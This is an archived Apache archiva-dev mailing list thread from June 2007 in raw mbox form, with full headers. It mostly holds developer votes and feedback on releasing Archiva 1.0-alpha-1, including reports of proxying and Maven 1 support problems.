/maven/archiva/trunk/archiva-web/archiva-webapp/pom.xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/3/07, Brett Porter <[email protected]> wrote: > You should be able to borrow the configuration from the selenium tests? Do they use Tomcat? I didn't look but assumed everything else is using Jetty... -- Wendy From [email protected] Mon Jun 04 00:16:38 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16250 invoked from network); 4 Jun 2007 00:16:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Jun 2007 00:16:37 -0000 Received: (qmail 57322 invoked by uid 500); 4 Jun 2007 00:16:41 -0000 Delivered-To: [email protected] Received: (qmail 57210 invoked by uid 500); 4 Jun 2007 00:16:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57201 invoked by uid 99); 4 Jun 2007 00:16:41 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 03 Jun 2007 17:16:41 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx05.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 03 Jun 2007 17:16:37 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAABb3YkY6sjPZ/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,378,1175436000"; d="scan'208";a="49292516" Received: from 217.123.dsl.syd.iprimus.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by smtp05.syd.iprimus.net.au with ESMTP; 04 Jun 2007 10:16:14 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: svn commit: r543842 - /maven/archiva/trunk/archiva-web/archiva-webapp/pom.xml Date: Mon, 4 Jun 2007 10:16:11 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org Yep. On 04/06/2007, at 9:49 AM, Wendy Smoak wrote: > On 6/3/07, Brett Porter <[email protected]> wrote: >> You should be able to borrow the configuration from the selenium >> tests? > > Do they use Tomcat? I didn't look but assumed everything else is > using Jetty... > > -- > Wendy From [email protected] Mon Jun 04 02:37:15 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59616 invoked from network); 4 Jun 2007 02:37:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Jun 2007 02:37:14 -0000 Received: (qmail 79172 invoked by uid 500); 4 Jun 2007 02:37:18 -0000 Delivered-To: [email protected] Received: (qmail 79135 invoked by uid 500); 4 Jun 2007 02:37:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79126 invoked by uid 99); 4 Jun 2007 02:37:17 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 03 Jun 2007 19:37:17 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 03 Jun 2007 19:37:13 -0700 Received: by an-out-0708.google.com with SMTP id d30so340461and for <[email protected]>; Sun, 03 Jun 2007 19:36:52 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=rLFkEjSzCBJMIpq7jb1NFp12yHDCJomgU12fDau/AfOfeEjYgJXNI7X1D9ozA6YSmFWiNphV5XjnAkV9DOTiiY0K9GfcyK+RO4XBooGmD0g8cDf64NQxO67P6+3M6U9La6VuLcCM9Nt9j8iVrYwU3VNFhYhZIgj9IXr9EoBnALI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=l994Ye0daXoBr/scKyO72v0ZM5l56Jiy6AqaB0TS+XIuZRStnEsS0BQX6mg8kltqRQ8anSVwsjCXfee71tqCfR6BJQpToFYDFQnm2FTy6StkfmvH8rgzjJxBhJ3Iaknsu+EQu0h/pCY0cHJpK3sNqqquNf7N0OE/x5ZHk5UPGe4= Received: by 161.129.204.104 with SMTP id s19mr2320967anb.1180924612550; Sun, 03 Jun 2007 19:36:52 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 3 Jun 2007 19:36:52 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 3 Jun 2007 19:36:52 -0700 From: "Wendy Smoak" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/1/07, Joakim Erdfelt <[email protected]> wrote: > Archiva 1.0-alpha-1 was tagged and built this afternoon. > > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ ... > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... +1 - license and notice files in place, known problems with proxying prevent me from testing as thoroughly as I'd like, but it appears to serve artifacts that are already in its repos. Thanks for all your work on this! -- Wendy From [email protected] Mon Jun 04 03:07:00 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66808 invoked from network); 4 Jun 2007 03:07:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Jun 2007 03:07:00 -0000 Received: (qmail 518 invoked by uid 500); 4 Jun 2007 03:07:04 -0000 Delivered-To: [email protected] Received: (qmail 397 invoked by uid 500); 4 Jun 2007 03:07:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 387 invoked by uid 99); 4 Jun 2007 03:07:03 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 03 Jun 2007 20:07:03 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wa-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 03 Jun 2007 20:06:57 -0700 Received: by wa-out-1112.google.com with SMTP id v33so2994937wah for <[email protected]>; Sun, 03 Jun 2007 20:06:37 -0700 (PDT) Received: by 161.129.204.104 with SMTP id b16mr4303753wak.1180926396891; Sun, 03 Jun 2007 20:06:36 -0700 (PDT) Received: from ?161.129.204.104? ( [161.129.204.104]) by mx.google.com with ESMTP id t1sm5124737poh.2161.129.204.104.06.34; Sun, 03 Jun 2007 20:06:36 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 04 Jun 2007 11:06:27 +0800 From: Maria Odea Ching <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070306) MIME-Version: 1.0 To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org +1 Everything on the release notes seems to be in place. Thanks Joakim :-) -Deng Joakim Erdfelt wrote: > Archiva 1.0-alpha-1 was tagged and built this afternoon. > > The proposed distribution, including binary distributions, and > signatures can be found here: > > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > > To keep up with the trend started by Wendy Smoak (sorta): > The 1.0-alpha-1 staged copy was setup and configured to point to > a pre-built repository, and then used to build the next archiva > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. > > This will be Archiva's first release with a proper database, and > is intended to get a testable baseline of the archiva feature set > into the hands of all interested individuals. > > The list of issues identified and closed with this release can > be found below: > > Archiva 1.0-alpha-1 Release Notes: > > http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 > > > This is an alpha release, and as such, has bugs. > > Once people have a chance to kick the prototype tires, and look around, > the most urgent jira tickets will be addressed quickly for a 1.0-alpha-2 > release, with an expected release 1 to 2 weeks after this one. > > Known issues include documentation, problems with proxying, problems > running the webapp on Tomcat, missing reporting, empty or inaccurate > dependency tree information, and poor grammar. > These and other issues can be tracked at the URL below: > > Archiva 1.0-alpha-2 Open Issues: > http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 > > > Once you have had a chance to examine the distribution, please cast > your vote. We welcome votes and feedback from all community members. > > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... > > 72 hours ends Monday afternoon (GMT -5) > If you need more time, just ask. > From [email protected] Mon Jun 04 07:13:02 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12083 invoked from network); 4 Jun 2007 07:13:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Jun 2007 07:13:00 -0000 Received: (qmail 22879 invoked by uid 500); 4 Jun 2007 07:13:04 -0000 Delivered-To: [email protected] Received: (qmail 22848 invoked by uid 500); 4 Jun 2007 07:13:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22839 invoked by uid 99); 4 Jun 2007 07:13:04 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Jun 2007 00:13:04 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Jun 2007 00:12:59 -0700 Received: by ug-out-1314.google.com with SMTP id 34so773814ugf for <[email protected]>; Mon, 04 Jun 2007 00:12:37 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=jRSRQ8CntqpTMqjf4XxuznTzdObMx13ug71f2azZxqiKA9Qim9C3P/zUF2uYpQBZ+8BMaR020VTWsFQ2xTz1hKCjNpjh5kWMiCzERTm6pLNJn7XyLb1Qn7kmlocHI4NawsyMFUcIxViMzLZrAdcihnwnqUc5V42ZPLUMPB7vZgc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=qUOBcTC/L5ozEqy4ZyY1CbvD1w3TbniyDQM2H1Ns3UcZQrrAaHY0vzGkCy5zZaYq6qSE33il3rQ5y7w81u0hqLNJiz/M9TcEn+okzN1i2n6hqeGMWWp+KHAJJQC9Wk9ISLzVQaAhqTj1BRGw2yHR7db9yMobZc41tVYh15KjEcE= Received: by 161.129.204.104 with SMTP id f19mr1881874hue.1180941157696; Mon, 04 Jun 2007 00:12:37 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 4 Jun 2007 00:12:37 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 4 Jun 2007 09:12:37 +0200 From: "nicolas de loof" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_30766_4136895.1180941157670" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_30766_4136895.1180941157670 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline +1 as a new clean codebase for enhancements, based on 0.9 features set. My personnal feedback on current features : + Verry clean configuration UI - Getting artifacts from a proxied repository doesn't work - Lack of support for Maven 1 (requests are not converted to get artifacts from a maven2 managed repo) - wagon-provider-api 1.0 has a ConcurrentModificationException issue (WAGON-79) 2007/6/4, Maria Odea Ching <[email protected]>: > > +1 > > Everything on the release notes seems to be in place. > Thanks Joakim :-) > > -Deng > > Joakim Erdfelt wrote: > > Archiva 1.0-alpha-1 was tagged and built this afternoon. > > > > The proposed distribution, including binary distributions, and > > signatures can be found here: > > > > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > > > > To keep up with the trend started by Wendy Smoak (sorta): > > The 1.0-alpha-1 staged copy was setup and configured to point to > > a pre-built repository, and then used to build the next archiva > > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. > > > > This will be Archiva's first release with a proper database, and > > is intended to get a testable baseline of the archiva feature set > > into the hands of all interested individuals. > > > > The list of issues identified and closed with this release can > > be found below: > > > > Archiva 1.0-alpha-1 Release Notes: > > > > > http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 > > > > > > This is an alpha release, and as such, has bugs. > > > > Once people have a chance to kick the prototype tires, and look around, > > the most urgent jira tickets will be addressed quickly for a 1.0-alpha-2 > > release, with an expected release 1 to 2 weeks after this one. > > > > Known issues include documentation, problems with proxying, problems > > running the webapp on Tomcat, missing reporting, empty or inaccurate > > dependency tree information, and poor grammar. > > These and other issues can be tracked at the URL below: > > > > Archiva 1.0-alpha-2 Open Issues: > > > http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 > > > > > > Once you have had a chance to examine the distribution, please cast > > your vote. We welcome votes and feedback from all community members. > > > > [ ] +1 Release it! > > [ ] 0 > > [ ] -1 Don't release it, because... > > > > 72 hours ends Monday afternoon (GMT -5) > > If you need more time, just ask. > > > > ------=_Part_30766_4136895.1180941157670-- From [email protected] Mon Jun 04 08:41:58 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39151 invoked from network); 4 Jun 2007 08:41:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Jun 2007 08:41:57 -0000 Received: (qmail 51902 invoked by uid 500); 4 Jun 2007 08:42:01 -0000 Delivered-To: [email protected] Received: (qmail 51875 invoked by uid 500); 4 Jun 2007 08:42:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51866 invoked by uid 99); 4 Jun 2007 08:42:01 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Jun 2007 01:42:01 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Jun 2007 01:41:56 -0700 Received: by an-out-0708.google.com with SMTP id d30so355902and for <[email protected]>; Mon, 04 Jun 2007 01:41:35 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=Uj/7mekjg03I5t5r5WBxaaCxi7zIogO9K3h0u8lsBYxfjLjpzZydEbNG4BUFIXCbxpzcoEJ0GVoA9Zg8tj1vnrYqbvhMQpW0P/DmOV6q4n6EZPGS4ZwAxpFPW9JW0kT5dSJ4M2y8OZlYjBY6LosA4rEUOhHlakvDRcUoAoLcAFk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=ebbMY+IOpbqYhsGA0X/3QYAfM58dCmzwXp3dkIHifBVd0xI+SP+VGc8ZJzKAYfYRYtnVjwjIyTuruNx9Fll7h25S1nq2gOT4A/ikP3xkwzZmz1szsgdzJwzA18hk9FRDkp7RUcNfEUMeau/ID5BlarZSg9sB5Wb3dpm/IO//UjM= Received: by 161.129.204.104 with SMTP id y11mr2449268anf.1180946495184; Mon, 04 Jun 2007 01:41:35 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 4 Jun 2007 01:41:35 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 4 Jun 2007 10:41:35 +0200 From: "Fabrice Bellingard" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_31290_15845945.1180946495141" References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_31290_15845945.1180946495141 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline +1, I'm happy with it already. :-) Nicolas, getting artifacts from proxied remote repositories works fine for me (at least it used to 3 days ago...). If I can help... Fabrice. On 6/4/07, nicolas de loof <[email protected]> wrote: > > +1 as a new clean codebase for enhancements, based on 0.9 features set. > > My personnal feedback on current features : > > + Verry clean configuration UI > - Getting artifacts from a proxied repository doesn't work > - Lack of support for Maven 1 (requests are not converted to get artifacts > from a maven2 managed repo) > - wagon-provider-api 1.0 has a ConcurrentModificationException issue > (WAGON-79) > > > 2007/6/4, Maria Odea Ching <[email protected]>: > > > > +1 > > > > Everything on the release notes seems to be in place. > > Thanks Joakim :-) > > > > -Deng > > > > Joakim Erdfelt wrote: > > > Archiva 1.0-alpha-1 was tagged and built this afternoon. > > > > > > The proposed distribution, including binary distributions, and > > > signatures can be found here: > > > > > > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > > > > > > To keep up with the trend started by Wendy Smoak (sorta): > > > The 1.0-alpha-1 staged copy was setup and configured to point to > > > a pre-built repository, and then used to build the next archiva > > > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. > > > > > > This will be Archiva's first release with a proper database, and > > > is intended to get a testable baseline of the archiva feature set > > > into the hands of all interested individuals. > > > > > > The list of issues identified and closed with this release can > > > be found below: > > > > > > Archiva 1.0-alpha-1 Release Notes: > > > > > > > > > http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 > > > > > > > > > This is an alpha release, and as such, has bugs. > > > > > > Once people have a chance to kick the prototype tires, and look > around, > > > the most urgent jira tickets will be addressed quickly for a > 1.0-alpha-2 > > > release, with an expected release 1 to 2 weeks after this one. > > > > > > Known issues include documentation, problems with proxying, problems > > > running the webapp on Tomcat, missing reporting, empty or inaccurate > > > dependency tree information, and poor grammar. > > > These and other issues can be tracked at the URL below: > > > > > > Archiva 1.0-alpha-2 Open Issues: > > > > > > http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 > > > > > > > > > Once you have had a chance to examine the distribution, please cast > > > your vote. We welcome votes and feedback from all community members. > > > > > > [ ] +1 Release it! > > > [ ] 0 > > > [ ] -1 Don't release it, because... > > > > > > 72 hours ends Monday afternoon (GMT -5) > > > If you need more time, just ask. > > > > > > > > ------=_Part_31290_15845945.1180946495141-- From [email protected] Mon Jun 04 09:20:41 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50306 invoked from network); 4 Jun 2007 09:20:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Jun 2007 09:20:39 -0000 Received: (qmail 32670 invoked by uid 500); 4 Jun 2007 09:20:43 -0000 Delivered-To: [email protected] Received: (qmail 32641 invoked by uid 500); 4 Jun 2007 09:20:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32632 invoked by uid 99); 4 Jun 2007 09:20:43 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Jun 2007 02:20:43 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ik-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Jun 2007 02:20:38 -0700 Received: by ik-out-1112.google.com with SMTP id c30so714097ika for <[email protected]>; Mon, 04 Jun 2007 02:20:17 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=A+eQfaMl5KAgINFPQvRg2vu1kHpw9qgBdDX4+EHfTpyztWPZjTEB4OKmzVJ1mjxhqfZs8dVglun66/ZBlds5xwlusA6VMn8RRVHOU81KuisakIxqf4ZMRc0mTkzOv7I7Hsrn7bFTlVSXOudCGBWurfbDxpsHttpWtFVWHsU3gyg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=o57TTGQqBkUenYU41hZONrQ1QOuWgD1ijXDHXLxIS6tXGhvdyhX5f19Uj6E6YmNMOKn4hRp3ZmabEGynR5S0GNvgmGr7yCzgYePiSduyc2PuuSSFENk51UqbGVEMAM3vlGac6W1OxMardnBO4uvYNAXCgaeCiLjgZOQBBGot2FA= Received: by 161.129.204.104 with SMTP id y20mr1902598hue.1180948810333; Mon, 04 Jun 2007 02:20:10 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 4 Jun 2007 02:20:10 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 4 Jun 2007 11:20:10 +0200 From: "nicolas de loof" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_31798_11994472.1180948810302" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_31798_11994472.1180948810302 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline You're right, I missunderstood the default configuration of network proxies. I just had to reconfigure the network proxies to point to my managed repo. What is the default "internal" managed repo ? 2007/6/4, Fabrice Bellingard <[email protected]>: > > +1, I'm happy with it already. :-) > > Nicolas, getting artifacts from proxied remote repositories works fine for > me (at least it used to 3 days ago...). If I can help... > > Fabrice. > > On 6/4/07, nicolas de loof <[email protected]> wrote: > > > > +1 as a new clean codebase for enhancements, based on 0.9 features set. > > > > My personnal feedback on current features : > > > > + Verry clean configuration UI > > - Getting artifacts from a proxied repository doesn't work > > - Lack of support for Maven 1 (requests are not converted to get > artifacts > > from a maven2 managed repo) > > - wagon-provider-api 1.0 has a ConcurrentModificationException issue > > (WAGON-79) > > > > > > 2007/6/4, Maria Odea Ching <[email protected]>: > > > > > > +1 > > > > > > Everything on the release notes seems to be in place. > > > Thanks Joakim :-) > > > > > > -Deng > > > > > > Joakim Erdfelt wrote: > > > > Archiva 1.0-alpha-1 was tagged and built this afternoon. > > > > > > > > The proposed distribution, including binary distributions, and > > > > signatures can be found here: > > > > > > > > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > > > > > > > > To keep up with the trend started by Wendy Smoak (sorta): > > > > The 1.0-alpha-1 staged copy was setup and configured to point to > > > > a pre-built repository, and then used to build the next archiva > > > > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. > > > > > > > > This will be Archiva's first release with a proper database, and > > > > is intended to get a testable baseline of the archiva feature set > > > > into the hands of all interested individuals. > > > > > > > > The list of issues identified and closed with this release can > > > > be found below: > > > > > > > > Archiva 1.0-alpha-1 Release Notes: > > > > > > > > > > > > > > http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 > > > > > > > > > > > > This is an alpha release, and as such, has bugs. > > > > > > > > Once people have a chance to kick the prototype tires, and look > > around, > > > > the most urgent jira tickets will be addressed quickly for a > > 1.0-alpha-2 > > > > release, with an expected release 1 to 2 weeks after this one. > > > > > > > > Known issues include documentation, problems with proxying, problems > > > > running the webapp on Tomcat, missing reporting, empty or inaccurate > > > > dependency tree information, and poor grammar. > > > > These and other issues can be tracked at the URL below: > > > > > > > > Archiva 1.0-alpha-2 Open Issues: > > > > > > > > > > http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 > > > > > > > > > > > > Once you have had a chance to examine the distribution, please cast > > > > your vote. We welcome votes and feedback from all community > members. > > > > > > > > [ ] +1 Release it! > > > > [ ] 0 > > > > [ ] -1 Don't release it, because... > > > > > > > > 72 hours ends Monday afternoon (GMT -5) > > > > If you need more time, just ask. > > > > > > > > > > > > > ------=_Part_31798_11994472.1180948810302-- From [email protected] Mon Jun 04 15:45:58 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81631 invoked from network); 4 Jun 2007 15:45:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Jun 2007 15:45:57 -0000 Received: (qmail 39701 invoked by uid 500); 4 Jun 2007 15:46:00 -0000 Delivered-To: [email protected] Received: (qmail 39674 invoked by uid 500); 4 Jun 2007 15:46:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 39665 invoked by uid 99); 4 Jun 2007 15:46:00 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Jun 2007 08:46:00 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Jun 2007 08:45:54 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 281624803E for <[email protected]>; Mon, 4 Jun 2007 15:45:33 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id E30E54801A for <[email protected]>; Mon, 4 Jun 2007 15:45:32 +0000 (UTC) Message-ID: <[email protected]> Date: Mon, 04 Jun 2007 11:51:17 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org doh! *I* never voted on this. :-) +1 to release. - Joakim Joakim Erdfelt wrote: > Archiva 1.0-alpha-1 was tagged and built this afternoon. > > The proposed distribution, including binary distributions, and > signatures can be found here: > > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > > To keep up with the trend started by Wendy 